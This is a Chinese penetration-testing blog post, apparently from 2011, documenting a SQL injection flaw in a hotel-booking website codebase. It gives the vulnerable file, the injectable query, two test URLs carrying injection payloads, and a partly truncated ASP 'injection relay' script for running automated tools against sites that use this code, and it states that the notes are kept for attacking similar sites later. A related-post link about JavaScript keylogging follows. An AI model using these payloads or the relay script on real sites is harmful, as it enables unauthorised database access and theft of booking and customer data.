酒店、宾馆预定,酒店查询,酒店网站 SQL 注入漏洞。
私人脚本漏洞库放的老玩意儿,很久了,之前干一个站,总结的一点资料,方便日后干同类型的站,很多宾馆预订、酒店查询类的网站都用这套源码,这个漏洞比较菜,勿喷。。。
我个人喜欢总结每次渗透的资料,越详细越好。
漏洞名称:
酒店、宾馆预定,酒店查询,酒店网站 SQL 注入漏洞
发现时间:
2011年8月28日, 01:54:11
漏洞文件:
/hotel/hotel_search.asp
利用条件:
Null
漏洞原因:
文件:/hotel/hotel_search.asp,没有过滤提交参数,导致任意注入。
网站内很多文件均存在此漏洞,不止这一个。
Sql查询语句为:
select * form table where ( name='关键词' and minPrice >0 and minPrice
关键词:' and minPrice >0 Or ''='
漏洞测试:
1、https://lcx.cc/hotel/hotel_search.asp?cid=2&intime=2011-8-28&outtime=2011-8-31&p1=0&p2=100000&jdld=0&key_name='%20or%20''='
2、https://lcx.cc/hotel/hotel_search.asp?cid=2&intime=2011-8-28&outtime=2011-8-31&p1=0&p2=100000&jdld=0&key_name='%20and%20minPrice>218%20or%20''='
漏洞利用:
1、由于注入语句比较特别,无法使用工具直接跑,需使用注入中转:index.asp。
2、使用方法(需先修改文件中的URL地址):http://127.0.0.1/index.asp?sql=SQL语句
注意事项:
1、Null
其他信息:
Null
index.asp 注入中转脚本源码:
" Response.Write "select * form table where ( name='" & Sql & "' and minPrice >0 and minPrice " Response.BinaryWrite Xml.ResponseBody Response.End '----------------------------------------------------------------' '功能描述:URL编码函数 '输入参数:中英文混合字符串,f是否对ASCII字符编码 '返回值:编码后的ASC字符串 Public Function UrlEncoding(v, f) 'URL编码 Dim s, t, i, j, h, l, x: s = "": x = Len(v) For i = 1 To x t = Mid(v, i, 1): j = Asc(t) If j > 0 Then If f Then s = s & "%" & Right("00" & Hex(Asc(t)), 2) Else s = s & t End If Else If j
文章来源于lcx.cc:酒店、宾馆预定,酒店查询,酒店网站 SQL 注入漏洞
相关推荐: js 实现键盘记录,兼容 FireFox 和 IE
另外一篇文章,Xss高级技巧劫持键盘:http://www.xssxss.com/fuck/285.xss From:http://hi.baidu.com/%D3%F0%E9%E4%C8%CA/blog/item/2922c9e9bed5b238b90e2d…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论